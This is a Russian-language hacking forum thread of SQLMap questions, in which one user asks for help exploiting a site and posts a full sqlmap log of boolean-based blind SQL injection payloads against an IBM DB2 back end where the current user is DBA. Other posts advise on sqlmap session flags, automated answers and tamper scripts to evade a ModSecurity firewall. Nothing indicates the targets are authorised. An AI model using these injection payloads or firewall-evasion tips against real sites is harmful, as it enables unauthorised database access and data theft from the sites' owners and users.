Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. cna

    cna New Member

    Joined:
    10 Feb 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    1
    считаю если с прив все ок то помоему нельзя залиться только если не понятно почему не выдает пути к специальной папке вне корня надо инклуд или как еще отуда дальше) и откуда то

    интересно мускуль еще не научился как то кампастить с отведенной папки то?)
    ну тут или обойти исполнения или надо понять как можно обойти эту опцию)
     
  2. Sentureg

    Sentureg New Member

    Joined:
    31 Jul 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите раскрутить сайт
    Parameter: SiteId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Vector: AND [INFERENCE]


    Code:
    [14:07:25] [INFO] the back-end DBMS is IBM DB2
    back-end DBMS: IBM DB2
    [14:07:25] [INFO] fetching current user
    [14:07:25] [PAYLOAD] 200001
    [14:07:25] [INFO] retrieving the length of query output
    [14:07:25] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'PPkh'='PPkh
    [14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'PPkh'='PPkh
    [14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'PPkh'='PPkh
    [14:07:28] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'PPkh'='PPkh
    [14:07:29] [INFO] retrieved:
    [14:07:29] [DEBUG] performed 4 queries in 3.84 seconds
    [14:07:29] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'PPkh'='PPkh
    [14:07:30] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'PPkh'='PPkh
    [14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'PPkh'='PPkh
    [14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'PPkh'='PPkh
    [14:07:34] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'PPkh'='PPkh
    [14:07:36] [INFO] retrieved:
    [14:07:36] [DEBUG] performed 9 queries in 10.87 seconds
    current user:   None
    [14:07:36] [INFO] testing if current user is DBA
    current user is DBA:    True
    [14:07:36] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
    [14:07:36] [INFO] fetching database (schema) names
    [14:07:36] [INFO] fetching number of databases
    [14:07:36] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(66) AND 'MrxP'='MrxP
    [14:07:39] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(97) AND 'MrxP'='MrxP
    [14:07:42] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(101) AND 'MrxP'='MrxP
    [14:07:43] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(119) AND 'MrxP'='MrxP
    [14:07:44] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(120) AND 'MrxP'='MrxP
    [14:07:45] [INFO] retrieved:
    [14:07:45] [DEBUG] performed 5 queries in 8.49 seconds
    [14:07:45] [ERROR] unable to retrieve the number of databases
    [14:07:45] [INFO] falling back to current database
    [14:07:45] [INFO] fetching current database
    [14:07:45] [INFO] retrieving the length of query output
    [14:07:45] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'SSnj'='SSnj
    [14:07:46] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'SSnj'='SSnj
    [14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'SSnj'='SSnj
    [14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'SSnj'='SSnj
    [14:07:48] [INFO] retrieved:
    [14:07:48] [DEBUG] performed 4 queries in 3.55 seconds
    [14:07:48] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'SSnj'='SSnj
    [14:07:49] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'SSnj'='SSnj
    [14:07:51] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'SSnj'='SSnj
    [14:07:54] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'SSnj'='SSnj
    [14:07:55] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'SSnj'='SSnj
    [14:07:59] [INFO] retrieved:
    [14:07:59] [DEBUG] performed 9 queries in 13.88 seconds
    [14:07:59] [WARNING] on IBM DB2 you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
    [14:07:59] [CRITICAL] unable to retrieve the database names
    
    [*] shutting down at 14:07:59
    пробывал --hex, --no-cast, не помогает
     
  3. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток, использую sqlmap на Kali, насколько мне известно, сканирование пишется в лог, и после повторного сканирования sqlmap берет предыдущие результаты из лога, скажите пожалуйста, как очистить лог? Папку output не обнаружил.
     
  4. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,804
    Likes Received:
    14,187
    Reputations:
    116
    @aZohan

    обычно

    file:///хоум фолдер/.sqlmap/output
     
  5. h3xp1017

    h3xp1017 Member

    Joined:
    28 Oct 2015
    Messages:
    85
    Likes Received:
    29
    Reputations:
    1
    session.sqlite

    не?
     
  6. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    вы имеете ввиду предыдущую сессию? Не совсем понял вас. Вот еще что думаю, юзаю предустановленный софт sqlmap, может лучше будет склонировать его с git's ?
     
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    --flush-session Flush session files for current target
    --fresh-queries Ignore query results stored in session file
    Заглядывайте чаще в мануал
     
    dmax0fw likes this.
  8. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Всем доброго время суток! По вашему мнению, что лучше использовать: предустановленный sqlmap в kali linux или лучше склонировать с github?
     
  9. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    apt-get update && apt-get upgrade && apt-get dist-upgrade
     
    _________________________
    #729 SooLFaa, 30 Aug 2018
    Last edited: 30 Aug 2018
  10. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    106
    Likes Received:
    128
    Reputations:
    46
    а зачем всё это в бэкграунде выполнять?:)
     
  11. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    Схлопнул второй амперсанд.
     
    _________________________
  12. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Благодарю за ответ. Ежедневно выполняю следующие команды: sudo apt update, sudo apt upgrade. Разницы же нет у команд: sudo apt upgrade, sudo apt full-upgrade и sudo apt dist-upgrade?
     
  13. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    Разница есть, но не в данном случае.
     
    _________________________
  14. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    Ребят сори за тупой вопрос

    возможно ли мепу задать через команду
    --batch что бы сначала он сам задавал ответ "N" , но если идет крит подключения , от дампа , он сам отвечал "Y"
     
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N")
    Там куча разных условий ответа!
    Пример:
    --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"
     
    #735 cat1vo, 4 Sep 2018
    Last edited: 4 Sep 2018
    panic.ker, dmax0fw and Xsite like this.
  16. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    Спасибо :) так намного проще )
     
  17. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток, может кто подсказать какой тампер против этого waf идёт "[CRITICAL] WAF/IPS/IDS identified as 'ModSecurity: Open Source Web Application Firewall (Trustwave)'"
    Заранее благодарен.
     
  18. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    Попробуй:
    Code:
    --tamper "modsecurityzeroversioned.py"
     
  19. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    буду пробовать эти:
    modsecurityversioned.py окружает полный запрос комментариями
    modsecurityzeroversioned.py окружает комментарии, "0" полным запросом
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Вообще суть тамперов, как они работают можно посмотреть в папке sqlmap'a tamper, частенько бывает что в наборе нету нужного, тогда изучаем суть WAF'a, создаем свой тампер и кладем в папочку, дальше просто его подключаем.
     
    _________________________
    RWD, cat1vo and crlf like this.
Loading...